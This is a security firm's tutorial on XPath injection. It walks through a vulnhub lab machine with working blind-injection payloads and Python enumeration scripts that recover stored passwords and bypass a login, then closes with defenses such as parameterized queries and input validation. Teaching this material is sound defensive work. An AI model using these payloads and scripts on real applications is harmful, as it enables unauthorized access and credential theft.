Rhino Security Labs

Practical XPath Injection: Attack and Defense Techniques

Practical XPath Injection Exploits

When auditing a web application, it is easy to overlook certain types of vulnerabilities unless you systematically check for each one. Injection exploits are well known, and indeed they are listed as number one in the OWASP Top 10; however, in this article we will discuss an attack that is much less well known than SQL injection: XPath and XQuery injection.

What Are XPath and XQuery?

XPath is a language that queries an XML document to locate a piece of information, such as elements matching a certain pattern or containing a certain attribute. If the client controls part of the XPath query being used, and this input is not sanitized, the client can read the entire XML document once they determine its structure. This is because, unlike typical database query languages, XPath has no access controls or user authentication. XQuery is a superset of the XPath language that adds SQL-like syntax as well as some useful functions for querying the document.

Useful Query Statements

In order to exploit an XPath injection, we will first cover a few common functions and syntax of XPath queries that would indicate to us that a document is vulnerable. I’ll briefly cover some of the important XPath and XQuery syntax here, but the full documentation can be found on the w3schools website.

Selecting a Node

“nodename” – Selects all nodes with the name “nodename”.

“/nodename” – Selects from the root node (the top most element in the document that is not xml).

“//nodename” – Selects matching nodes anywhere in the document, no matter how deep they are.

“..” – Selects the parent of the current node.

“child::node()” – Selects all children of the current node (“child” is the axis name).

Functions

“name(/node)” – Returns the node name of an element. If /node is invalid, returns empty.

“selector::node()” – Matches any node along the given selector (axis), for example “child::node()”.

Putting It All Together

To see how we can exploit this, we will review one part of the “Darknet” vulnerable machine located on vulnhub.com. As with most machines on vulnhub, the ultimate goal is to gain root access on the machine in any way possible. If you’re going to follow along and attempt the exercise yourself, it’s important to note that we have started roughly half way through the challenge for the point of demonstrating XPath injection.

When loading up our vulnerable website, we are greeted with a secure logon portal for staff members. Earlier in the challenge, a pseudo SQL injection was needed to bypass a different virtual host. Attempting the same SQL injection failed on this portal, and using sqlmap to try to exploit the login failed as well, so we must find a different way to move forward.

The /xpanel/ path led to the login portal, which we were not able to bypass using SQL injection.

Navigating the website, we discover the page /contact.php, which takes an ID parameter to select which staff member you’ve requested. This parameter is a prime target for additional fuzzing, so as a jumping-off point we try SQL injection; however, it was not vulnerable to this attack. Our hunch tells us that it has to be querying something, so let’s assume it’s an XML document instead of a database.

The contact.php page, showing the email address for the user with the associated ID.

If the page were querying an XML document, we could assume that the query looks something like this:

//user[@id=ID_FROM_URL]/email/text()

Assuming it’s using some sort of attribute selector, we can inject brackets to see how the application responds. If our ID was 1][1 instead of simply 1, the query would become

//user[@id=1][1]/email/text()

The appended [1] predicate simply selects the first user that matches, so the statement remains functionally the same, yet we have altered the query directly. (A payload such as 2][2 would instead ask for the second user with an ID of 2 and return nothing.) If we enter an invalid or false query, the query will return nothing for us. The screenshots below confirm this: our successful injection yields a result in the contact page, while false statements return nothing.

The payload “1][1” injected into the ID parameter evaluates successfully, yielding the username.

The payload “last()-1 and 1=2” evaluates to false, as 1 will never equal 2; thus the query fails and nothing is returned.
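To make the effect of these payloads concrete, here is a minimal sketch of how a vulnerable application might assemble its query. The template is the one assumed earlier in this article; the real server-side code is unknown, and `build_query` is a hypothetical name used only for illustration.

```python
# Assumed query shape from the article; the real server-side code is unknown.
QUERY_TEMPLATE = "//user[@id={id}]/email/text()"


def build_query(id_param: str) -> str:
    """Mimic a vulnerable application that pastes the raw parameter into XPath."""
    return QUERY_TEMPLATE.format(id=id_param)


if __name__ == "__main__":
    # A benign ID, the bracket payload, and the always-false payload.
    for payload in ("1", "1][1", "last()-1 and 1=2"):
        print(f"{payload!r:22} -> {build_query(payload)}")
```

Because the parameter is concatenated without any validation, whatever we send becomes part of the predicate, which is what gives us a true/false signal in the page.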

Now that we have confirmed the XPath injection and have a way to evaluate true and false statements in the response of the application, we can attempt to exploit this further. In order to execute useful arbitrary queries, we need to learn more about the structure of the document. We can discover node names in two ways, either via brute forcing the node names or guessing them from a word list.

The first method would essentially search the alphanumeric space using the function “starts-with”, enumerating nodes using the wildcard selectors or parent selectors. A brute-force query would look something like

1=starts-with(name(..), 'a')

This evaluates true if the name does indeed start with an ‘a’ and false otherwise. We could then attempt to continue the chain into

1=starts-with(name(..), 'aa')

to determine if the node starts with “aa” and so on and so forth. This method is slow, time consuming and should only be used as a last resort.
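The character-by-character approach can be sketched as follows. This is only an illustration: `oracle` is a hypothetical callable that sends a payload to the application and returns True when the page shows a result, and the candidate alphabet is an assumption (XML names may contain other characters).

```python
import string
from typing import Callable

# Characters tried at each position (an assumption; XML names allow more).
ALPHABET = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_-."


def brute_force_name(oracle: Callable[[str], bool],
                     target: str = "..",
                     max_len: int = 32) -> str:
    """Recover name(target) one character at a time via starts-with().

    `oracle` is a hypothetical callable that submits the payload and
    returns True when the application's response indicates a true statement.
    """
    prefix = ""
    while len(prefix) < max_len:
        for ch in ALPHABET:
            payload = f"1=starts-with(name({target}), '{prefix + ch}')"
            if oracle(payload):
                prefix += ch
                break
        else:
            # No candidate extends the prefix, so the name is complete.
            return prefix
    return prefix
```

Each recovered character can cost up to one request per candidate in the alphabet, which is why this approach is so much slower than guessing from a wordlist.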

The second method takes a wordlist and attempts to guess node names in a similar fashion. As noted in the syntax summary above, the name function returns an empty string if no valid node is provided as input. Thus, we can use a guess-and-check method with a query like

INT=string-length(name(//NODE))

This query attempts to find the node and, if one exists, compares the length of its name against INT (the length of the name we guessed), returning true when they match. If no valid node is found, the length will be zero, returning false.

Attack: Utilizing XPath and XQuery

Knowing our strategy, we can now attempt to build a script to enumerate the list of nodes. Essentially we must request the endpoint numerous times using the payload

1 and INT=string-length(name(//NODE))

where NODE is a value fed in from a file and INT is the length of the value given. We combined the Spanish and the big English wordlists from the “dirb” tool (a common directory busting tool used against web applications), giving us 20,000 different names to attempt. In a little over 3 minutes, the script completed and we were greeted with 6 discovered node names.

The enumeration attacker script to guess and check valid node names.
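The original script is only shown as a screenshot, so the following is a rough sketch of what such an enumerator could look like, not the author's code. The host name in `BASE_URL` is a placeholder, and treating an “@” in the response body as “true” is an assumption based on the contact page printing an email address when the query matches.

```python
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List

# Placeholder host; the article only gives the /contact.php path.
BASE_URL = "http://darknet.example/contact.php"


def http_oracle(payload: str) -> bool:
    """Send the payload as the id parameter and report whether it was true.

    Assumption: the page prints an email address (containing '@') when
    the query matches, and nothing otherwise.
    """
    url = BASE_URL + "?" + urllib.parse.urlencode({"id": payload})
    with urllib.request.urlopen(url, timeout=10) as resp:
        return b"@" in resp.read()


def enumerate_nodes(words: Iterable[str],
                    oracle: Callable[[str], bool] = http_oracle) -> List[str]:
    """Return every word that exists as a node name in the document."""
    found = []
    for word in words:
        word = word.strip()
        if not word:
            continue  # skip blank lines in the wordlist
        payload = f"1 and {len(word)}=string-length(name(//{word}))"
        if oracle(payload):
            found.append(word)
    return found
```

Something like `enumerate_nodes(open("wordlist.txt"))` would then walk a wordlist file (the file name here is hypothetical). Words that are not valid XPath names simply produce a failing query and are reported as not found.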

An interesting result above is “clave,” which is Spanish for “password” and our target for bypassing the login. Knowing the node names, we can also determine the number of child nodes each one contains, using the payload

INT=count(//NODE/child::node())

Incrementing the INT value until the statement is true for node name NODE tells us how many children each node has. Copying and modifying the same script above yields the following results.

Modified attacker script determining children nodes using the query “?id=1 and INT=count(//NODE_NAME/child::node())”, where INT is an integer to be incremented until the statement returns true, and NODE_NAME is a valid node name from above.
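The counting step can be sketched in the same style. As before, `oracle` is a hypothetical callable that submits a payload and returns True when the application shows a result, and the upper bound `max_children` is an arbitrary assumption to keep the loop finite.

```python
from typing import Callable, Optional


def count_children(node: str,
                   oracle: Callable[[str], bool],
                   max_children: int = 50) -> Optional[int]:
    """Increment INT until `INT=count(//NODE/child::node())` is true."""
    for n in range(max_children + 1):
        payload = f"1 and {n}=count(//{node}/child::node())"
        if oracle(payload):
            return n
    # Either there are more than max_children, or the oracle never said true.
    return None
```

Note that `//NODE` matches every element with that name, so the count is the total across all of them, and `child::node()` also counts text nodes, not just child elements.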

Knowing each element has a child, we can now begin brute forcing different combos to yield separate results. In our scenario, we do not know the parent name of the node we are currently on (as we did not attempt to brute force it), so we must try all combos relative to root and the parent node to return results. To do this, our payload will look like

ID] /NODE1 | //NODE2 [ID

where ID is the ID of the user, and NODE1 and NODE2 are valid names from the enumerated nodes above. (Note: The “|” indicates the union of two queries.) Modifying the script once more yielded all combinations of these nodes, and retrieved the sensitive data we were after to bypass the login at /xpanel/.

Modified attacker script showing all combinations of valid nodes being executed as well as the data returned back to the application. The /clave node yielded the password for both user accounts, which allowed us to log in to the administrative /xpanel/ directory.
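Generating the combinations is straightforward. The sketch below fills the payload template given above with every ordered pair of discovered node names; the function name is hypothetical, and each resulting payload would still need to be sent to the application and its response inspected.

```python
from itertools import product
from typing import Iterable, Iterator


def union_payloads(user_id: str, nodes: Iterable[str]) -> Iterator[str]:
    """Yield `ID] /NODE1 | //NODE2 [ID` for every ordered pair of node names."""
    names = list(nodes)
    for node1, node2 in product(names, repeat=2):
        yield f"{user_id}] /{node1} | //{node2} [{user_id}"
```

With 6 node names this produces 36 payloads per user ID, which is small enough to try exhaustively.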

Defense: Protecting Against XPath and XQuery Vulnerabilities

Much like SQL injection, the best defense against this attack is to use precompiled (parameterized) queries. Because the structure of these queries is fixed before user input is bound to them, one can avoid the troublesome escaping of dangerous characters, which is easy to implement incorrectly. If a dynamic query must be executed, ensure that the characters used to break out of the context (such as the brackets in our example) are escaped properly before execution.
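When a dynamic query cannot be avoided and the parameter is expected to be numeric, as the ID in our example is, strict allow-list validation is often simpler and safer than escaping. The following is a minimal sketch under that assumption; the query template is the one assumed earlier in this article, and `safe_query` is a hypothetical name.

```python
import re

# Same assumed query shape as in the attack walkthrough.
QUERY_TEMPLATE = "//user[@id={id}]/email/text()"
_ID_PATTERN = re.compile(r"[0-9]{1,9}")


def safe_query(id_param: str) -> str:
    """Build the query only if the parameter is a plain decimal integer."""
    if not _ID_PATTERN.fullmatch(id_param):
        raise ValueError("id must be a short string of ASCII digits")
    # int() normalizes the value, so only a number ever reaches the query.
    return QUERY_TEMPLATE.format(id=int(id_param))
```

Every payload used in this article contains brackets, spaces, or function calls and is rejected before it reaches the XPath engine. Where the XPath library supports variable binding (lxml, for example, accepts `$name` variables passed as keyword arguments to `xpath()`), that is closer to the precompiled approach and is preferable for non-numeric input.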

Conclusion

XPath injection is a great example of how an attacker can go from virtually no information about an application to discovering detailed information about it, and ultimately to compromising the administrative accounts. This is by no means a definitive guide to XPath and XQuery injection, but we hope that this attack walkthrough gives its audience a good grasp of the steps of an attack and how to defend an application against it.